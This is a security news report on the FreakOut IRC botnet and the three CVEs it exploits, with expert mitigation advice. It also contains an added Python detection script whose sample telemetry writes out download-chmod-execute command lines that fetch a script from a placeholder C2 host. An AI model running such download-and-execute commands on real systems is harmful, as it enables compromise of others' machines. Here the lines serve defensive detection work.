Researchers discovered a new Internet Relay Chat (IRC) bot Tuesday that exploits three vulnerabilities to conscript Linux systems into distributed denial-of-service attacks, cryptomining and other malicious activity.
Dubbed “FreakOut” by Check Point researchers, after Freak, the code author’s name, the bot went active in November 2020 and has been running ever since, with 300 current users and five channels. One active channel, #update, includes 186 exploited devices that communicate with the IRC server.
Based on the malware’s features, the researchers said the attackers use the compromised systems for further attacks: spreading laterally across the victim company’s network, or launching attacks on outside targets while masquerading as the compromised company.
The attacks use three vulnerabilities to target devices running the following software:
- CVE-2020-28188: TerraMaster Operating System, used to manage TerraMaster network attached storage servers.
- CVE-2021-3007: Zend Framework, used to build web applications and services using PHP, with more than 570 million installations.
- CVE-2020-7961: Liferay Portal, a web app platform written in Java that offers features relevant for the development of portals and websites.
The researchers said that in all the attacks involving the three CVEs, the attacker first tries several different syntaxes of OS commands to download and execute a Python script named “out.py.” After the script is downloaded and made executable (using the “chmod” command), the attacker tries to run it with Python 2. The researchers note that although Python 2 reached end-of-life last year, the attacker appears to assume the victim’s device still has the deprecated interpreter installed.
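The download / chmod / Python 2 sequence described above is a useful hunting pattern on its own. The following is an added example (not code from the article or from Check Point) that correlates process-execution records per host and flags a host once all three stages of the chain appear; the hostnames, the command lines and the EXAMPLE-C2-PLACEHOLDER download source are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample telemetry: (host, command line). Not real events.
SAMPLE_EVENTS = [
    ("nas-01", "wget http://EXAMPLE-C2-PLACEHOLDER/out.py -O /tmp/out.py"),
    ("nas-01", "chmod 777 /tmp/out.py"),
    ("nas-01", "python2 /tmp/out.py"),
    ("web-02", "curl -s http://EXAMPLE-C2-PLACEHOLDER/out.py > /tmp/out.py"),
    ("web-02", "chmod +x /tmp/out.py"),
    ("web-03", "python3 /opt/app/out.py"),  # benign: Python 3, unrelated script
]

# One regex per stage of the chain the article describes. The execute
# pattern deliberately matches only python / python2 / python2.x, since
# the loader is run with Python 2.
STAGES = {
    "download": re.compile(r"\b(curl|wget)\b.*\bout\.py\b"),
    "chmod":    re.compile(r"\bchmod\b.*\bout\.py\b"),
    "execute":  re.compile(r"\bpython2?(\.\d+)?\b.*\bout\.py\b"),
}


def classify(command):
    """Return the chain stage a single command line matches, or None."""
    for stage, pattern in STAGES.items():
        if pattern.search(command):
            return stage
    return None


def detect_chain(events):
    """Group stage hits per host.

    Hosts that show every stage are reported as 'full_chain'; hosts that
    show some but not all stages (e.g. download + chmod with no execution
    yet) are reported as 'partial_chain' so an analyst can still review them.
    """
    seen = defaultdict(set)
    for host, cmd in events:
        stage = classify(cmd)
        if stage:
            seen[host].add(stage)
    all_stages = set(STAGES)
    full = sorted(h for h, s in seen.items() if s == all_stages)
    partial = sorted(h for h, s in seen.items() if s != all_stages)
    return {"full_chain": full, "partial_chain": partial}


if __name__ == "__main__":
    print(detect_chain(SAMPLE_EVENTS))
```

In a real deployment the stage patterns would run over process-creation telemetry (auditd, EDR) rather than an in-memory list, and matching on the script name alone should be treated as a low-confidence signal that only becomes an alert when the stages correlate on one host.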
Yaniv Bar-Dayan, co-founder and CEO at Vulcan Cyber, said the FreakOut attacks are similar to what we saw with SolarWinds Sunburst in that hackers are exploiting multiple vulnerabilities and attack vectors.
“These hacks are sophisticated and count on the odds that more known vulnerabilities have not been remediated or mitigated leaving the door wide open,” Bar-Dayan said. “Organizations must adopt a vulnerability remediation campaign approach that requires all the people, processes and tools across security and IT to get on the same page and work towards a ‘get fix done’ outcome.”
Wade Lance, CTO at Illusive, recommended a dual approach. First, security teams should shore up system defenses by performing traditional vulnerability management processes and patching to eliminate high-risk system vulnerabilities. Second, because some vulnerabilities might be zero-day, security teams should develop a strategy to detect and thwart attacker reconnaissance and lateral movement activities, which are necessary to identify and exploit targeted systems.
“For the latter consider an active defense strategy and solution like that defined by MITRE Shield,” Lance said.
Derek Manky, chief of security insights and global threat alliances at Fortinet’s FortiGuard Labs, said half of the top ten attacks FortiGuard Labs monitors aim to perform operating system and command injection attacks on IoT devices. For organizations and security teams, Manky said it’s crucial to not just double down on security for one Linux platform, but take aim with a multi-factored approach: ensure all devices are on segmented, local networks and are publicly routed only in necessary scenarios, and in those cases, absolutely use VPN and multi-factor authentication for login.
“Organizations should also make sure IoT/Edge devices are visible and inspected on the network through east-west and north-south traffic,” Manky said. “This means supporting inspection for CVE exploitation with IPS from lateral movement on the same network segment, and also external initial exploitation for public facing devices.”
Chad Anderson, senior security researcher at DomainTools, added that the vulnerabilities exploited have been patched in the relevant software, and while the adversary’s Python obfuscation is not particularly sophisticated, malware doesn’t have to be sophisticated to do damage.
“So far we can see a good 300 or more infected hosts, but the delivery domain has already been blocklisted by a number of industry standard blocklists so most security devices should block communication with the domain,” Anderson said. “This does not mean, however, that security professionals should let their guard down since the Zend Framework is widely used. We recommend that anyone using the Zend Framework in production confirm that they have updated this year to cover the most recent exploit used in this attack.”